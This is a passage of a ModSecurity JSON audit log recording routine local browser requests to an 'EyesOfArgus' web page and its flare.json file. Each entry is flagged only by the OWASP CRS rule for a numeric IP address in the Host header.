server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc7Dn8AAQEAABwQSCQAAAAD\"]"],"stopwatch":{"p1":385,"p2":850,"p3":43,"p4":236,"p5":46,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:50 --0400","transaction_id":"WRc7Dn8AAQEAABwQSCUAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc7Dn8AAQEAABwQSCUAAAAD\"]"],"stopwatch":{"p1":384,"p2":847,"p3":43,"p4":307,"p5":46,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:59:08 --0400","transaction_id":"WRc7XH8AAQEAABwRiHwAAAAE","remote_address":"127.0.0.1","remote_port":43582,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:57:46 GMT","If-None-Match":"\"ccc-54f6ab8a0710a-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc7XH8AAQEAABwRiHwAAAAE\"]"],"stopwatch":{"p1":605,"p2":992,"p3":82,"p4":362,"p5":51,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:59:08 --0400","transaction_id":"WRc7XH8AAQEAABwRiH0AAAAE","remote_address":"127.0.0.1","remote_port":43582,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:57:47 GMT","If-None-Match":"\"295-54f6ab8b53192\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:08 GMT","ETag":"W/\"295-54f6abd8205b9\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc7XH8AAQEAABwRiH0AAAAE\"]"],"stopwatch":{"p1":629,"p2":1353,"p3":83,"p4":192,"p5":77,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1kAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc8tn8AAQEAABzhe1kAAAAF\"]"],"stopwatch":{"p1":614,"p2":1044,"p3":58,"p4":319,"p5":63,"sr":23,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1oAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:04:50 GMT","ETag":"\"107-54f6ad1e5f7e6\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc8tn8AAQEAABzhe1oAAAAF\"]"],"stopwatch":{"p1":386,"p2":932,"p3":57,"p4":212,"p5":56,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1sAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc8tn8AAQEAABzhe1sAAAAF\"]"],"stopwatch":{"p1":596,"p2":1217,"p3":66,"p4":441,"p5":69,"sr":24,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:04:54 --0400","transaction_id":"WRc8tn8AAQEAABzhe1wAAAAF","remote_address":"127.0.0.1","remote_port":43584,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc8tn8AAQEAABzhe1wAAAAF\"]"],"stopwatch":{"p1":620,"p2":1457,"p3":95,"p4":424,"p5":131,"sr":32,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:16 --0400","transaction_id":"WRc9RH8AAQEAABwOGoMAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc9RH8AAQEAABwOGoMAAAAB\"]"],"stopwatch":{"p1":580,"p2":1220,"p3":88,"p4":482,"p5":90,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:16 --0400","transaction_id":"WRc9RH8AAQEAABwOGoQAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:07:12 GMT","ETag":"\"107-54f6ada649b21\"","Accept-Ranges":"bytes","Content-Length":"263","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id 